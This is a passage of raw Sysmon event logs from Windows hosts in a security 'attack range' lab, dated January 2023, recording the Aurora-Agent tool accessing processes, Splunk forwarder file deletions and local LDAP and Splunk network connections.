Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041827Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.814{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041826Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.811{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041825Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.808{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041824Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.807{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041823Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.804{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041822Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.803{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041821Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.802{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041820Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.801{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041819Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.800{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000041818Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.368{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5770724446FABE60D73E27F4A28C9593,SHA256=D958140D62E458800921D3354157E58A50884FF28B2DE92D93A0BC19BD26F7C3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041817Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.286{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041816Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.285{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041815Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.182{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-F104-00000000AF02}6068C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000016469Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:55.181{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E246FF9B4340E6CDCF9E06A9E33CACF,SHA256=9CD0AA7A13E96A48BEA1791B14DF92A568DE5722B83252459DDCB25CF75DE315,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041842Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:55.880{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=29C346D37DDA64153621612AF82D4706,SHA256=64FADC6402AF895DFDA751B59A4A056D479357CB2098F1F3ED74C8335B18D666,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041841Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:55.332{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F78850F03E8F5827C9F9840849AA016,SHA256=B7457B3C4B80D57517967F5D9EF72177E78C1851FAE176A6F30054E50456CB10,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000041845Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.319{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56296-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000041844Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.319{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56296-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 23542300x800000000000000041843Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:56.444{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EB793216A6EF6E7CCF3AC3C512D2E64,SHA256=0E3D074D3632AA5EAD44289ECB251D10BC7082978A1C30230F69CABA91F694B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016470Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:56.251{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A232279E3D5FAC9C0EE5888C7FFA07EA,SHA256=1AE9A17B7B86C1A4C3250E5CE4EB9CCD1B4909E629A052C4089EA613CD2D5C6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041846Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:57.540{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F7CA787BD15841FC48957C65352D5C9,SHA256=16E55489A7CCFD93A25B96BF249CCA078FB11E5345D810318D18B3D0FF8FC9B8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016471Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:57.337{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17ED4ADF7B8D01CAFFF68781B6573B64,SHA256=A6073E4A2AA576AFD2BE6D4AA225A24FFD0642E51EC7E577A99C29F78320DE1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041848Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:58.644{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16182176C021D92955C886527DFF3D84,SHA256=37D244C250217EF8B148CE979D2261EFCE0C39AC16532E000B09A84BCD8007CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016472Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:58.435{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C325A72961E5BE2A550100378326A64,SHA256=82D24786184C720E520AB66FBBC38D4E9B2C9728E92C1B59D39C0315891245B0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000041847Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:56.525{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56297-false10.0.1.12-8000- 23542300x800000000000000041849Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:59.755{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C8ED0E202CFF558280AB0E6E7C59B75,SHA256=1913B8B04DC928C5B9A2DA49AB47DBD979BFFCE65DF01B7F27B7F381BB2C9433,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000016474Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:58.035{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50095-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000016473Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:59.519{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3611D8B006F9500DA18832ADC7BA255,SHA256=46EE91508ADD376E2684EB303C6A5C66C27656119913BD92F3C15E22AAD4A3CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041851Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:00.863{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABF91BEBF10CF89AD06984064A2E7DA8,SHA256=1F9ED641F34EF1E69CEBD3319E64A3D1EDAC7081FA9F02818D65FFFBF6E42CC1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016476Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:00.609{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A069E2F60E39BC9E14884299AD8E0425,SHA256=5519A28DF3B6A4B3EC7310DD6DEDC64DEBC0546F183118345DA46CF90CAAFA08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016475Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:00.550{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=CDF0231CD21404695FEBAD0730EAF48F,SHA256=FA7AFB0EEC905AFC1F1266D9AFBF38DBE589A933F2A8CFC80AF08056D8FDFFB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041850Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:00.316{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=B58DA10384F8CD05C2FA031536AA9C8C,SHA256=854D9A0E45513B5B7E002EB91685B8D53593CE6A0CEAC159E89D20FA53A295FE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041852Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:01.964{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=261CC91FA89C1DD1FBFCAE4E2DC978A9,SHA256=B87F2AED45BB1E8AD96B234562F4617B1A7397176FBCBBC96D1AB5AA7213EB41,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016477Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:01.583{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9A1ECABF65BD0931FBE2EB24DCCFD5A,SHA256=E1B737BDB5567A32602BD888CE058E68CA8B663468D56D46424A7EA8138C8172,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000016509Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.768{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016508Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.766{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016507Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.765{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016506Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.761{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000016505Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:02.758{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program 